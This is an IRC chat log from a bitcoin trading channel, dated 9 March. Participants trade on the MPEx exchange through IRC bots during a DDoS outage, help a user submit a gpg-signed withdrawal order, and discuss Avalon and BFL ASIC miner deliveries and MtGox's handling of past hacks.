pympex now work with this irc bot? Mar 09 06:33:33 Would be nice, but no. Mar 09 06:34:16 nah, it would have to be encapsulated into a supybot Mar 09 06:34:30 kinda trivial but someone has to sit down and do it Mar 09 06:35:02 I;lll give it a shot Mar 09 06:35:09 doctor_pullfingr im just thinking, you want to talk to mpex programatically, pympex is like two pages of python Mar 09 06:35:13 there's also a perl script Mar 09 06:35:18 seem the easiest, just use as a lib Mar 09 06:35:57 mircea_popescu: what about setting up 100 AWS t1.micro instances (only $23/year if reserved, or $1.91/month), and install the proxy server and bind on each. Then add all 100 instance IPs as A records to mpex.co. Mar 09 06:36:10 I'm kinda worried about security on that approach because Im just some warehouse developer. Mar 09 06:36:57 maximian wanna do it ? Mar 09 06:37:07 LOL… I have a life :) Mar 09 06:37:19 doctor_pullfingr i scarcely see how more code can mean more security, in principle. Mar 09 06:37:24 maximian :p Mar 09 06:38:01 someone in the us got their Avalon now Mar 09 06:38:04 take that BFL Mar 09 06:38:10 bfl is so dead... Mar 09 06:38:36 i wonder how likely it is that by the time my avalon 2 ships, bfl still hasn't shipped? Mar 09 06:38:41 I'm not at all against that, just voicing a concern. I had the idea that the developer for the OT server thought more about authentication more than I care to think about it Mar 09 06:38:49 theres 200 BTC say NO on bitbet Mar 09 06:38:52 damn Mar 09 06:38:55 yeah Mar 09 06:38:58 was it you? Mar 09 06:39:07 or bfl themselves lol Mar 09 06:39:18 doctor_pullfingr yeah, i'm mostly talking outloud on the topic too Mar 09 06:39:27 mpex uses gpg authentication though so why you need OT's auth on top of that? Mar 09 06:39:30 Bowjob who knows Mar 09 06:39:48 knotwork i took it he meant he's concerned as to what to do with the data coming out of pympex Mar 09 06:39:49 i feel bad for mr 500 BTC on yes Mar 09 06:39:51 though I suppose you could plug in GPG libs instead of OTs currencty crypto libs since it meant to be pluggable Mar 09 06:40:20 I don't have enough rich friends where I can convince them to spend 30 BTC per account. Mar 09 06:40:31 Bowjob bitbet is doing some brisk trade this month for sure Mar 09 06:40:32 what is the actual use case? own things in mpex on behalf of people you act as broker for? Mar 09 06:40:59 pretty much. yes. Mar 09 06:41:23 prolly jurov can help you there Mar 09 06:41:30 I have passthrough Mar 09 06:41:38 passthroughs* Mar 09 06:41:38 so you want to tamper-proof your own records of what you are holding on behalf of who? Mar 09 06:41:49 !mp http://dpaste.com/1016859/ Mar 09 06:41:49 Processing. Mar 09 06:41:51 Response: http://dpaste.com/1016860/plain/ Mar 09 06:42:29 dude this irc bot thing is so cute... Mar 09 06:42:41 That's so fucking cool Mar 09 06:42:55 maximian ikr ?! Mar 09 06:42:56 it just needs to be integrated into pympex and we're done Mar 09 06:43:21 its suprising people actually use IRC bot. I made entire exchanges between umpteen coin types before and no one ever used it Mar 09 06:43:38 knotwork when i brought mpex back after it's half day pause yest Mar 09 06:43:47 trades kept dinging i dunno if any under 50 btc Mar 09 06:43:51 like maybe 1k in an hour Mar 09 06:44:49 yeah weird, as it even still needs the gpg that people complain about Mar 09 06:45:10 mine was plain IRC bot, just say hello to it give it password, standard insecure crap like normal people seem to prefer Mar 09 06:45:34 held wallet for you based on your IRC nick, one wallet per type of altcoin Mar 09 06:46:30 is it true at all that using Tor .onion site or i2p site these DDOS attacks would not work? Mar 09 06:46:45 I would've though the DDOS might just kind of clog entire Tor or i2p system Mar 09 06:48:06 [HAVELOCK] [SDICE] 3 @ 0.545 = 1.635 BTC [-] Mar 09 06:51:11 It looks like you can actually start 100 t1.micro instances in Amazon's Ireland data centre… tempting Mar 09 06:51:24 keep it out of the U.S. Mar 09 06:51:36 but Amazon is a US company Mar 09 06:51:43 true Mar 09 06:51:47 I wonder how that plays out legally Mar 09 06:51:53 so, sounds like old school irc server and irc bot/supybot/pympex is all I need Mar 09 06:53:03 to hook up mpex to ripple Mar 09 06:53:13 knotwork the tor proposition is a little more complicated Mar 09 06:53:19 there are chokepoints Mar 09 06:53:36 maximian so go for it, you'll have a second life Mar 09 06:53:54 doctor_pullfingr i don't see why you'd need an irc server Mar 09 06:53:58 just get a vps, run a supybot on it, Mar 09 06:54:06 to talk to the irc bots, and you're golden Mar 09 06:54:17 it'd be $437/month on a spot-price basis Mar 09 06:54:17 alternatively, wait till main mpex.co comes online Mar 09 06:54:33 maximian if you do it i'll cover your first month. Mar 09 06:55:20 does email still work for communicating with mpex? Mar 09 06:55:41 knotwork what do yo umean still ? Mar 09 06:55:57 its how I originally isgned up I think? Mar 09 06:56:10 tho hmm maybe I did use web for status command Mar 09 06:56:10 a yeah, t osign up. you gotta send me your public key Mar 09 06:56:17 but mx down atm. send me a pastie Mar 09 06:56:29 oh but thats it, email doesnt work for whole panoply of commands? Mar 09 06:57:00 knotwork it never did. i said at some point day before yest that if the worst comes to worst im taking mpex to email Mar 09 06:57:10 as a sort of bottom. Mar 09 06:58:03 Someone would have to be strongly dedicated for that to happen tho Mar 09 06:58:18 Anyway, I'm off to sleep. Night Mar 09 07:00:11 https://bitcointalk.org/index.php?topic=137534.1360 Mar 09 07:00:17 These are some delicious pictures Mar 09 07:01:34 cool Mar 09 07:01:38 so avalon hashing Mar 09 07:01:50 68 gigahash Mar 09 07:02:06 printing over $300 equivalent Mar 09 07:02:09 per day Mar 09 07:02:10 mhm Mar 09 07:02:11 not bad Mar 09 07:03:27 Also, Mar 09 07:03:28 https://bitcointalk.org/index.php?topic=150803.0 Mar 09 07:03:37 Looks like BFL might downgrade their specs Mar 09 07:04:06 $depth Mar 09 07:04:09 maximian: http://pastebin.com/ESBV6WRm Mar 09 07:04:41 bfl wil lgo down in history. Mar 09 07:07:15 who wants me to tell them how paranoid i am Mar 09 07:07:43 it's an interesting story about two events Mar 09 07:07:59 go ahead Mar 09 07:08:08 i received two phone calls this evening within 10 minutes on different phones Mar 09 07:08:13 unintelligellible speech Mar 09 07:08:21 one by voicemail Mar 09 07:08:26 one i spoke to Mar 09 07:08:35 i think it was information gathering Mar 09 07:08:41 https://blockchain.info/ is back Mar 09 07:09:07 i'm downloading the voicemail recording to study the waveform Mar 09 07:15:08 jcpham what information would be gathered ? Mar 09 07:15:43 i'm not sure... my voice, my location Mar 09 07:16:02 considering how often my phone rings Mar 09 07:18:22 Bowjob: so that was another batch 1 shipment that got delivered today? 0,o Mar 09 07:18:24 seems a bit behind Mar 09 07:19:16 behind against? Mar 09 07:19:46 its not like all the people who got them are posting Mar 09 07:20:00 this chinese dude didnt tell the forums until he had problems Mar 09 07:20:16 well, they did take forever] Mar 09 07:20:26 originally it was going to be shipped in january Mar 09 07:20:32 but still. deliveries are deliveries. Mar 09 07:20:34 ;;tslb Mar 09 07:20:37 Time since last block: 14 minutes and 31 seconds Mar 09 07:21:36 ahh, i saw the package picture and thought it just arrived Mar 09 07:24:44 gavin emailed some pools Mar 09 07:24:54 suggested increasing block limit Mar 09 07:25:07 paste ? Mar 09 07:25:08 or reminded them of where the config settings for this are located Mar 09 07:25:18 bitcoinfoundation blog Mar 09 07:25:24 prolly wanna follow that one Mar 09 07:28:07 https://bitcoinfoundation.org/blog/?p=135 Mar 09 07:28:15 lol at this guy Mar 09 07:28:24 he's not recommending anything but here's some guesswork. Mar 09 07:28:39 gavin should working in the bitcoin diplomatic corps Mar 09 07:28:40 with nanotube Mar 09 07:29:21 it's better than nothing Mar 09 07:30:02 hey, i'm for it. Mar 09 07:30:11 i like how he does fear, uncertainty, and doubt as three separate bitcointalk forum links Mar 09 07:30:26 i had closed it before that Mar 09 07:30:33 awwwwww Mar 09 07:32:21 i skim. Mar 09 07:33:31 >_> Mar 09 07:34:05 nanotube how goes the diplomatic corps Mar 09 07:34:38 the kids are totally abusing gribble Mar 09 07:48:07 :) Mar 09 07:49:51 ! Mp http://pastebin.com/FZPJL3V6 Mar 09 07:50:22 !mp http://pastebin.com/FZPJL3V6 Mar 09 07:50:23 Please use http://dpaste.com/ Mar 09 07:50:31 jborkl the mpexbot uses pastebin Mar 09 07:50:34 you got them mingled Mar 09 07:50:56 $post FZPJL3V6 Mar 09 07:51:00 mircea_popescu: http://pastebin.com/VEWf0P3T Mar 09 07:51:01 Ok, I almost have it worked out, to take mpex on your phone Mar 09 07:51:08 Trade Mar 09 07:51:13 kickass Mar 09 07:51:25 mod6 you hear that ? they're stealing your pie man! Mar 09 07:51:28 Two steps, working out the kinks Mar 09 07:51:53 !help Mar 09 07:51:53 List of commands: Mar 09 07:51:54 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 07:51:55 !mp (desc: returns the response from MPEX order) Mar 09 07:52:10 mmm :) Mar 09 07:52:16 nanotube $help post Mar 09 07:53:04 $help post Mar 09 07:53:04 nanotube: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 09 07:53:10 nice :) Mar 09 07:53:29 maybe consider making a separate channel with some help in topic. Mar 09 07:53:40 possibly. Mar 09 07:53:49 tho... to what benefit ? Mar 09 07:53:51 to make the different bots and their commands more discoverable... Mar 09 07:53:52 bots also rtake pms Mar 09 07:54:06 yeah the topic might use some reworking. things very fluid still. Mar 09 07:54:48 k. looking good :) Mar 09 07:55:39 anyway. the main mpex should be online soon and maybe maximian brings online a suite of tinies ? Mar 09 07:57:43 !mp http://dpaste.com/1016902/ Mar 09 07:57:44 Processing. Mar 09 07:57:46 Response: http://dpaste.com/1016904/plain/ Mar 09 08:00:25 !mp http://dpaste.com/1016906/ Mar 09 08:00:26 Processing. Mar 09 08:00:29 Response: http://dpaste.com/1016907/plain/ Mar 09 08:00:43 jborkl which mpex key are you using? Mar 09 08:01:33 F3e1 Mar 09 08:02:22 I got it off the key server,since I am doing this on my phone Mar 09 08:03:03 it's only the 9th Mar 09 08:03:11 F1B69921 not expired yet Mar 09 08:03:45 Ok, thanks. The phone will trade easily with the bot Mar 09 08:04:05 Only a couple steps, and they could be combined Mar 09 08:04:12 pretty cool Mar 09 08:05:03 It opens the potential, so people don't have to use python or be proficient with gpg Mar 09 08:05:33 yup Mar 09 08:10:46 !mp http://dpaste.com/1016911/ Mar 09 08:10:47 Processing. Mar 09 08:10:49 Response: http://dpaste.com/1016913/plain/ Mar 09 08:13:00 Nearly 80 percent of New York City high school graduates need to relearn basic skills before they can enter the City University’s community college system. They had to re-learn basic skills — reading, writing and math — first before they could begin college courses. Mar 09 08:13:09 win. Mar 09 08:13:37 jborkl i wonder what the trouble is there. Mar 09 08:16:01 Hi,why MPEx still cant be used? Mar 09 08:16:35 And I withdrawed 423bitcoin yesterday,and didnt receive yet Mar 09 08:17:14 ¡ Mar 09 08:17:30 shit Mar 09 08:17:33 i forgot how to read Mar 09 08:17:44 how the fuck do you forget how to read Mar 09 08:18:31 any MPEx staff here? Mar 09 08:20:11 Rick__ sup rick Mar 09 08:20:34 looky here : Mar 09 08:20:36 $help Mar 09 08:20:36 mircea_popescu: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Mar 09 08:20:37 MPEx,I still cant open the website Mar 09 08:20:46 yes, but you can use these bots to trade with. Mar 09 08:20:52 $help post Mar 09 08:20:52 mircea_popescu: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 09 08:20:56 !help Mar 09 08:20:57 List of commands: Mar 09 08:20:58 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 08:20:59 !mp (desc: returns the response from MPEX order) Mar 09 08:21:16 you put your command into either pastebin or dpaste Mar 09 08:21:21 then you give the bot the id of it Mar 09 08:21:26 and it gives you back a link to the response Mar 09 08:21:43 i've flushed deposits/withdrawals a number of times since yesterday, Mar 09 08:21:49 so complicated for me~~~~~~ Mar 09 08:22:04 if you didn't get yours processed tghere was a problem with it (such as it being larger than the amt available, for instance) Mar 09 08:22:31 so when can I receive my withdraw? Mar 09 08:22:35 it's 423 Mar 09 08:22:42 Mp, I am just tired. But I have it worked out to trade from the phone easily Mar 09 08:23:24 Rick__ if you've not received it yet there was a problem with it Mar 09 08:23:40 do a STAT to make sure what you can withdraw the do a withdrawal. Mar 09 08:23:53 jborkl very cool Mar 09 08:24:44 Rick__ do you understand ? Mar 09 08:25:06 [BTCTC] [ASICMINER-PT] 18 @ 0.74 = 13.32 BTC [-] Mar 09 08:25:25 [BTCTC] [ASICMINER-PT] 2 @ 0.749 = 1.498 BTC [+] Mar 09 08:25:43 o shit,you are right,I put a number big then I have Mar 09 08:25:53 my mistake Mar 09 08:26:10 np. Mar 09 08:26:29 and about the bots,I can only use them here? Mar 09 08:26:31 issue a fixed order, i'm arround so it will be processed fast. Mar 09 08:26:35 Rick__ yes, at the moment. Mar 09 08:26:45 we are working to bring much more power online, but it may take a little longer. Mar 09 08:26:49 and when will the MPEx be back/ Mar 09 08:27:05 as soon as possible. you can read a status update on the forum Mar 09 08:27:14 link Mar 09 08:27:24 https://bitcointalk.org/index.php?topic=138956.msg1598165#msg1598165 Mar 09 08:27:29 here and read down it's the whole story. Mar 09 08:27:30 thank you Mar 09 08:27:57 also people like jborkl_ are working to bring trade interface to phones Mar 09 08:28:03 and how can I give a withdraw command here/ Mar 09 08:28:10 i'll walk you through it. Mar 09 08:28:19 first make the clearsigned and encrypted text for it as normal Mar 09 08:28:24 then put it in pastebin.com Mar 09 08:28:45 okay,wait Mar 09 08:28:48 np Mar 09 08:29:30 about trade interface to phones,that's very very useful,I want know more later Mar 09 08:30:09 pastebin.com is a website?I cant open it Mar 09 08:30:39 yes http://pastebin.com/ Mar 09 08:30:42 you can not open that ? Mar 09 08:31:16 cant dame Chinese net Mar 09 08:31:28 Let me try another way Mar 09 08:32:14 ok alternative : Mar 09 08:32:26 dpaste.com Mar 09 08:32:29 can you see that ? Mar 09 08:33:00 yes,this one works Mar 09 08:33:11 and put my text in this one? Mar 09 08:33:33 yes Mar 09 08:33:42 and what's Syntax Mar 09 08:33:52 then say !mp url Mar 09 08:34:01 title name and email Mar 09 08:34:08 nono Mar 09 08:34:17 you put the gpg result. Mar 09 08:34:22 first you make your order Mar 09 08:34:27 then gpg --clearsign Mar 09 08:34:57 yes, just the code,leave other things along? Mar 09 08:35:18 yes they dnot matter Mar 09 08:35:20 dont* Mar 09 08:38:29 Okay,done Mar 09 08:38:43 can you see my order? Mar 09 08:39:30 you've not ordered it to the bot Mar 09 08:39:41 say !mp your paste url Mar 09 08:40:27 Rick__ what's the url to the paste you made ? Mar 09 08:40:40 sorry Mar 09 08:40:58 first which is the url you are talking about,i dont understand Mar 09 08:41:11 something like Mar 09 08:41:18 "url" define it please Mar 09 08:41:23 http://dpaste.com/1016940/ Mar 09 08:41:40 yes,mine is http://dpaste.com/1016930/ Mar 09 08:41:54 !mp http://dpaste.com/1016930/ Mar 09 08:41:55 Processing. Mar 09 08:41:57 Response: http://dpaste.com/1016944/plain/ Mar 09 08:42:02 there's your response from mpex. Mar 09 08:42:09 Okay,cool Mar 09 08:42:21 now understand a bit Mar 09 08:42:30 sorry,I dont know much about computer Mar 09 08:43:29 flushed. Mar 09 08:45:42 ;;tslb Mar 09 08:45:49 Time since last block: 13 minutes and 9 seconds Mar 09 08:46:23 Okay,I gott go,and waiting for MPEx back Mar 09 08:47:32 later! Mar 09 09:05:08 is the mpex api data working atm? Mar 09 09:05:33 checking Mar 09 09:05:49 thank you Mar 09 09:05:54 $vwap Mar 09 09:05:56 mircea_popescu: http://pastebin.com/KcmBKFe0 Mar 09 09:06:16 seems so Mar 09 09:06:46 ahh sweet thank you sir Mar 09 09:08:55 hey guys Mar 09 09:08:57 thanks nanotube! Mar 09 09:11:02 i guess i have to wait for website to come back to get a website version of the api? Mar 09 09:12:05 yeah Mar 09 09:12:34 answer kinda included in the questions innit :D Mar 09 09:18:36 i have another super awesome blog-a-ma-post Mar 09 09:18:40 coming soon! Mar 09 09:18:55 about how me and this dude are video collaborating using mega.co.nz Mar 09 09:19:14 cool Mar 09 09:19:44 me and my friend nick were bitching about how we don't have dropbox accounts Mar 09 09:19:54 that hold hundreds of gbs Mar 09 09:19:56 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ 220 to 52 against Mar 09 09:20:04 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ 100 to 13 for Mar 09 09:20:12 dude avalon is wiping the floor with bfl Mar 09 09:20:25 i should've ordered Mar 09 09:20:33 they were quick to deliver on fpga Mar 09 09:20:41 nzghang or whatever his name is Mar 09 09:21:28 yeah Mar 09 09:21:40 isn't he the guy whi discovered the chips bfl used in fpga ? Mar 09 09:22:58 probably most likely Mar 09 09:23:06 seems like he reverse engineered it Mar 09 09:23:22 or identified it using all knowlege available Mar 09 09:25:22 he scraped the plastic off Mar 09 09:26:16 http://imgur.com/6Xe1Gw9 Mar 09 09:26:28 maybe he watched the history channel Mar 09 09:28:08 lol Mar 09 09:49:10 ngzhang is the one who reverse-engineered the identities of the fpga in bfl singles. Mar 09 09:49:44 ngzhang reconnected a trace that had been destroyed which prevented the chip from identifying itself normally. Mar 09 09:50:40 he is also the most ethical businessperson, next to magicaltux, I have ever seen operating in the ethics-challenged bitcoinland. Mar 09 09:51:57 present company excepted from such a comparison of course. Mar 09 09:54:04 kakobrekla http://goldprice.org/axstone/uploaded_images/gold_pull-723168.jpg Mar 09 09:54:07 [BTCTC] [GSDPT] 1 @ 0.00575 BTC [+] Mar 09 09:54:07 have you seen that before ? Mar 09 09:54:50 midnightmagic what's some highlights of magicaltux ethicalness ? Mar 09 09:56:49 mircea_popescu: Paying out-of-pocket for all hacks/malfunctions, giving out free yubikeys to help secure accounts, sponsoring events, fighting legal battles to help keep bitcoin legal, maintaining privacy of accounts (excepting the coinlab thing,) participating in infrastructure rollout, keeping permanent historical account trade records.. Mar 09 09:57:38 i do recall the absorbing of the failed polish exchange Mar 09 09:57:47 mircea_popescu: he also strongly fights against illegal activities and thefts that use his systems for laundry activities. Mar 09 09:57:55 but otherwise, no. trades were rolled back during their hack Mar 09 09:58:08 he lost 2000 btc from that, and paid out-of-pocket. Mar 09 09:58:14 so.. yes. Mar 09 09:58:19 keyword being all. Mar 09 09:58:27 they were out about 180mn dollars on that trade Mar 09 09:58:46 "avalon is wiping the floor with bfl" and "asicminer is wiping the floor with avalon" Mar 09 09:59:17 I'm failing to see how doing an exchange rollback as a result of unauthorized account activity is itself unethical. Mar 09 09:59:20 Ukto how much do they have online yet ? Mar 09 09:59:26 ;-) Mar 09 09:59:29 midnightmagic i didn't say it's ethical. Mar 09 09:59:45 over 9000 Mar 09 09:59:47 paying out of pocked for all hacks/malfunctions means they honor every single order at 1 cent a bitcoin that was ever made. Mar 09 09:59:49 well, over 10th Mar 09 10:00:00 Ukto so like 150 nominal avalons ? Mar 09 10:00:06 not in the context of ethical outline Mar 09 10:00:30 okay. Mar 09 10:00:31 more I am sure Mar 09 10:00:53 Ukto they were 60gh each, by spec iirc Mar 09 10:01:03 therebouts Mar 09 10:01:23 except AMs turnup time is far faster Mar 09 10:01:38 I can only say so much Mar 09 10:01:39 :) Mar 09 10:01:42 midnightmagic the sticky issues in my mind is whether the hacked account at that time was mtgox selftrading on customer credit, and whether the email leak at that time is something they failed to prevent Mar 09 10:01:52 kinda sad since i bought avalons and rooting for them Mar 09 10:02:02 but i know the reality of things hehe Mar 09 10:02:15 well, so they come out to about even as best i can see. Mar 09 10:02:22 both had product in january-ish Mar 09 10:02:30 bought bring online something like 10-20th by march. Mar 09 10:02:35 wiwthin the next 2~6 days Mar 09 10:02:40 that wont be true Mar 09 10:02:59 okay Mar 09 10:03:10 although if I get my avalons in the next week, i will be stoked :P Mar 09 10:03:13 but I doubt it Mar 09 10:03:15 mircea_popescu: There is no evidence that is the case, nor is there any evidence from our perspective that MtGox themselves did anything less than they could have to prevent the account leaks. From what we know, it was either two hacks, one of them being a readout from a financial analyst who had privileged access, and the other being completely unknown, or one hack, being the financial analyst. Mar 09 10:03:39 midnightmagic it's a fact that customers had been reporting passwords being broken into which tux/gox blamed on customers, for weeks prior. Mar 09 10:04:15 and the guy with the emails db claimed that it was mtgox poor practices (course... he's the thief) Mar 09 10:04:26 And we have no evidence that that is not the case. Also, many of those who complained publically disappeared and did not pursue the matter when confronted. Mar 09 10:04:32 this is also true Mar 09 10:05:02 in fact, afaik none did pursue the matter when confronted Mar 09 10:05:26 One of them did, but only on the forum, and did not seem at all concerned about losing $50k worth of bc. Mar 09 10:05:36 (that I'm aware of) Mar 09 10:05:57 anyways. just taking the opportunity to compare notes. Mar 09 10:06:01 Point is, MtGox has been exceedingly ethical, especially when contrasted with real-world banks and other financial institutions. Mar 09 10:06:44 Ukto re avalons, some deliveries have been popping up in the us Mar 09 10:06:49 Most of the inconsistencies we can see are just as likely to be MT's lack of perfect knowledge of what's going on, which of course I know of no people who are perfectly aware of their own systems. Mar 09 10:06:59 Yeah, Avalons are being delivered in California already Mar 09 10:07:04 yeah, but those are batch 1 Mar 09 10:07:05 right? Mar 09 10:07:13 Correct. Mar 09 10:07:16 batch 2 shipping eta was mar 5 ~ april 5 Mar 09 10:07:27 Batch #2, as far as I'm aware, hasn't even fully been order-filled. Mar 09 10:07:28 Oh man.. BFL victims caught a bad case of Stockholm Syndrome Mar 09 10:08:18 Ukto batch 1 was like 200 units iirc. that's a total 12th or thereabouts. Mar 09 10:08:29 this was supposedly ready on january. Mar 09 10:08:40 bach 1 was 300 Mar 09 10:08:43 asicminer, also ready in january, also 12 th, has slowly been bringing units online to about what, 5-7th now Mar 09 10:08:44 well mp, their deadline was actually feb 28 Mar 09 10:08:45 http://launch.avalon-asics.com/ Mar 09 10:08:55 yes, as I said Mar 09 10:08:59 the jan 20 was a "bonus" Mar 09 10:09:01 I know alot about AM that I cant discuss. :) Mar 09 10:09:04 just be ready to be surprised. Mar 09 10:09:04 that never materialized Mar 09 10:09:27 technically all of batch 1 was supposed to be shipped by march 1st Mar 09 10:09:37 Bowjob ya well, keeping accurate accounting of all the weird communication people pour into the market out of noobishness and whatever other reasons is difficult. Mar 09 10:09:38 yeah, they were 10 days late Mar 09 10:09:54 No, not all of it. Only a few dozen units. Mar 09 10:09:55 let's just go with a very barebone summary i say Mar 09 10:10:05 And in China, a few users did in fact receive their units. Mar 09 10:10:17 yifu said feb 28.. then he moved it to possible jan 20 deliver Mar 09 10:10:29 he did deliver 2 on jan, but got shut down by the chinese Mar 09 10:10:38 then resumed on march up to march 10, Mar 09 10:10:43 anyway, it's very fortunate and convenient that 1. asics are delivered by two companies with roughly equal output Mar 09 10:10:44 Some users did get their units outside of jgarzik and the btc foundation. Mar 09 10:10:54 and 2. that these are producing each less than about half the network Mar 09 10:10:59 yeah there was this chinese dude that didnt tell the forums Mar 09 10:11:03 safest scenario possible, it really surprised me. Mar 09 10:11:04 until he got problems Mar 09 10:11:22 Bowjob there were some who did report privately. i knew of a few. Mar 09 10:11:27 mhm Mar 09 10:11:30 people are in the end allowed to keep their privacy. Mar 09 10:12:04 so avalon did deliver, they are late for the rest though, since their deadline was by march 1st Mar 09 10:12:30 theres this one dude at the forums offering $10000 for an avalon Mar 09 10:12:39 hes lowballing Mar 09 10:12:53 if bfl fails to deliver, batch 2 avalon will ship Mar 09 10:12:53 primeasic? Mar 09 10:13:04 no, its just some random dude at the forums Mar 09 10:13:13 10k is lowballing ?! Mar 09 10:13:16 offering to buy an avalon for $10000 Mar 09 10:13:21 they retailed for like 1300 neh ? Mar 09 10:13:34 ;;calc 10/13 Mar 09 10:13:35 0.769230769231 Mar 09 10:13:45 lemme find the thread Mar 09 10:13:53 this is a little more than what asicminer increased. so... he's about in the market atm. Mar 09 10:14:39 https://bitcointalk.org/index.php?topic=140519.0 Mar 09 10:14:46 is he? Mar 09 10:14:46 lol Mar 09 10:16:57 i wou;dn't pay 10k for one. Mar 09 10:17:03 i would odds are pay $10k for a working alalon that was right here right now. Mar 09 10:17:24 could make it back in 15 days Mar 09 10:17:35 at current rates, and bfl wont get there in that time... Mar 09 10:18:07 when will bfl realistically ship?.. Mar 09 10:18:11 i would pay 1300 dollars within 60 days for a delivered and guaranteed asic. Mar 09 10:18:15 1.5 months is soonest i think Mar 09 10:18:16 that's about it. Mar 09 10:18:25 computer equipment is computer equpiment. Mar 09 10:18:31 what i do with it is nobody's business, what the heck is this. Mar 09 10:18:37 i mean, 200 BTC.. thats says no on bitbet Mar 09 10:18:39 wtf is that Mar 09 10:18:46 i wouldn't pay 10k for a computer just because i can make 10k on a computer in 15 days Mar 09 10:18:51 i'm intrested in that film stuff you were saying the other day mircea Mar 09 10:19:00 where you doing a commercial for mpex? Mar 09 10:19:05 me ? no / Mar 09 10:19:11 what film you mean ? Mar 09 10:19:13 not paying something for $10k when you could odds are get $50k from it in 3 months? Mar 09 10:19:19 you were going to film a renactment or osmething Mar 09 10:19:22 but canceled Mar 09 10:19:26 Chaang-Noi nope. i pay by costs not by what seller judges "i might make" Mar 09 10:19:27 im all about 500% Mar 09 10:19:30 that's none of his busioness. Mar 09 10:19:44 well, it was a buyer giving an offer Mar 09 10:19:45 do you like films? Mar 09 10:19:46 mhm, i find it good news that the asics that were shipped took a week only Mar 09 10:19:48 BitHub o, the gumpys. i never cancelled, the other party vanished. Mar 09 10:19:51 considering its from china Mar 09 10:20:02 i doubt anyone would really sell one for only 10k Mar 09 10:20:16 bitcoin is so bubbly i swear. Mar 09 10:20:27 yeah Mar 09 10:20:28 cant wait to get my hands on it. it even comes with gloves Mar 09 10:20:29 lol Mar 09 10:20:37 i bet asicminer shares are going to bubble soon Mar 09 10:20:51 !ticker Mar 09 10:20:52 I thought I told you not to touch me. Mar 09 10:20:59 lol Mar 09 10:21:01 ;;ticker Mar 09 10:21:01 damn chang, touching assbot Mar 09 10:21:02 BTCUSD ticker | Best bid: 44.40666, Best ask: 44.49000, Bid-ask spread: 0.08334, Last trade: 44.94000, 24 hour volume: 40002.15598561, 24 hour low: 42.41100, 24 hour high: 44.94000, 24 hour vwap: 43.69874 Mar 09 10:21:02 well, they got as high as the girl's low band. Mar 09 10:21:07 maybe they get as high as her high Mar 09 10:21:12 oh.. well as for the asic Mar 09 10:21:19 thats considering you convert it to fiat Mar 09 10:21:24 ASICMINER Mar 09 10:21:26 mp i would see 1.5 really Mar 09 10:21:27 which is very difficult for me to do Mar 09 10:21:28 lol Mar 09 10:21:28 in all its glory Mar 09 10:21:30 cou7ld* Mar 09 10:21:46 I wonder what people were thinking when they bought Avalon 1 Mar 09 10:21:59 i almost bought one Mar 09 10:22:00 josh said theyd deliver faster, and bfl were superior tech wise Mar 09 10:22:07 .. then whats the point of avalon then Mar 09 10:22:10 Chaang-Noi possibly. Mar 09 10:22:20 heck, yifu said avalon wont deliver first Mar 09 10:22:30 .. did someone see through josh's lie? Mar 09 10:22:31 Bowjob i think midnightmagic bought some, you can ask him Mar 09 10:23:00 yeah midnight, if you're from batch 1 Mar 09 10:25:29 $44.50 Mar 09 10:25:30 lol Mar 09 10:26:10 Bowjob: What was I thinking for batch #1? Mar 09 10:26:24 Yeah.. coz, back then BFL said they would deliver sooner Mar 09 10:26:28 and they had better specs Mar 09 10:26:36 so.. why would anyone buy from Avalon? Mar 09 10:26:54 and yifu announced after bfl announced Mar 09 10:28:09 Diversity of hardware in the event of asic doomsday, ethics of ngzhang, BFL's past history of late delivery, and I've been mining since Dec '10. Mar 09 10:28:29 Heck, I was about to order one from cablepair before he went insane. Mar 09 10:28:52 damn Mar 09 10:29:12 mhm.. the whole thing was a minefild Mar 09 10:29:13 field Mar 09 10:29:23 2 scames 1 legit Mar 09 10:29:25 I'm fairly sure that electricity won't be the lower bound of price for some time. The first time was market reaction to the bubble crash, and lots of doofuses predicting the death of bitcoin. Mar 09 10:29:52 and yet it.. never.. quite.. dipped below electricity costs. Mar 09 10:30:02 midnightmagic i'd guess electricity will never be the bound. fixed costs amortisation will always be larger from now on Mar 09 10:30:32 take a while for a 60gh asic to cost 1.x k usd in electricity. Mar 09 10:30:38 heck, if this becomes profitable for me I'll rent a warehouse Mar 09 10:30:39 by then probably better units need to be bought. and so... Mar 09 10:30:40 well growth is fairly significant right now Mar 09 10:31:01 and avalon users will get credit for a trade in, yeah? Mar 09 10:31:12 the thing is before a large portion of mining cost was hidden (as "free" expertise) Mar 09 10:31:12 Bowjob: The amusing part is, people who do that simply can't compete with the long tail of people doing for "free" in their hobby time and getting the cheap tier of residential electrical costs. :) Mar 09 10:31:23 since now all that is being paid for, people get a much better idea of their actual costs. Mar 09 10:31:39 Bowjob: Avalon customers are getting credit for Icarus trade-in and .. the other one. Lancelot. Mar 09 10:31:46 yeah Mar 09 10:31:48 in the future Mar 09 10:31:56 Trade in Avalon 1 for something else Mar 09 10:32:08 Bowjob: There is no indication that will happen. Mar 09 10:32:15 FPGA have a use outside of bitcoin. Mar 09 10:32:21 Avalon 1? Not so much. Mar 09 10:33:22 oh well.. decades from now, it will be a collector's item Mar 09 10:33:24 heh Mar 09 10:33:40 "This thing made a whole bunch of money and then suddenly became completely useless!" Mar 09 10:33:57 "It produced 7 BTC in its heyday" Mar 09 10:33:58 Damn Mar 09 10:34:06 7 BTC/Day Mar 09 10:34:07 lol Mar 09 10:34:10 "What is it?" "Don't know, every time we plug it in it keeps trying to connect to a weird IP address and port.." Mar 09 10:34:52 I'll tell you one thing. I am *SO* looking forward to the near-future day when I can shut all my g-d miners right the hell off. Mar 09 10:35:16 are you moving to LTC? Mar 09 10:35:27 wait nvm Mar 09 10:35:32 I mean my GPU and FPGA. I've been itching to do some FPGA development for some time now. Mar 09 10:36:03 I don't even bother RMA'ing my GPU anymore. Total waste of time. Mar 09 10:36:09 heh Mar 09 10:36:16 the first gpu miner... Mar 09 10:36:20 o boy. what a bomb Mar 09 10:36:53 ArtForz was pretty badass.. Mar 09 10:38:29 Is it viable to live off of BTC Mar 09 10:38:35 just by mining? Mar 09 